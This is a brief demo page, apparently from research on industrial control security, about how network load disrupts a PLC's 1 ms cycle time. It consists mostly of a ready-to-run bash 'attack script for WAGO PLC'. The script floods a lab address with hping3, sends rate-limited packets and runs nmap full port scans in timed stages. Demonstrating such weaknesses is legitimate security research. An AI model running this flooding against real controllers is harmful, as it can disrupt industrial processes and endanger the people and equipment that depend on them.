PLC Cycle Time Attack

Demo of how communication load can influence the cycle time of a PLC.

• Default main cyclic task is used.
• Cycle time is set to 1ms.
• Every 250 cycles the next output is set.

Attack on different PLCs

Attack Code

#!/bin/bash
# Attack Script for WAGO PLC

# Make sure only root can run our script
if [ "$(id -u)" != "0" ]; then
   echo "This script must be run as root" 1>&2
   exit 1
fi

# Check if device is reachable
echo "====================================="
echo "Check if device is reachable"
fping -c1 -t1000 10.0.0.2 2>/dev/null 1>/dev/null
if [ "$?" = 0 ]
then
  echo "Host rechable"
else
  echo "Host not rechable"
  exit 1
fi

# Idle
echo "====================================="
echo "Idle for 20s"
sleep 20s
read -p "Press any key for flooding..."

# Flooding full
echo "====================================="
echo "Hping3 flood for 20s"
echo "hping3 --flood 10.0.0.2"
timeout 20 hping3 --flood 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -p "Press any key for hping3 with delay..."

# Hping with delay
echo "====================================="
echo "Hping3 with delay between packets for 20s"
echo "hping3 -i u1100 10.0.0.2"
timeout 20 hping3 -i u1100 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -p "Press any key for standard nmap..."

# Standard nmap scan
echo "====================================="
echo "Standard nmap scan for a maximum of 20s"
echo "nmap 10.0.0.2"
timeout 20 nmap 10.0.0.2 &> /dev/null

# Idle 5s
echo "====================================="
echo "Idle for 5s"
sleep 5s
read -p "Press any key for full port scan..."

# Standard nmap full port scan
echo "====================================="
echo "Standard nmap full port scan for a maximum of 20s"
echo "nmap -p- 10.0.0.2"
timeout 20 nmap -p- 10.0.0.2 &> /dev/null

# End
echo "====================================="
echo "End of script"
read -p "Press any key to exit..."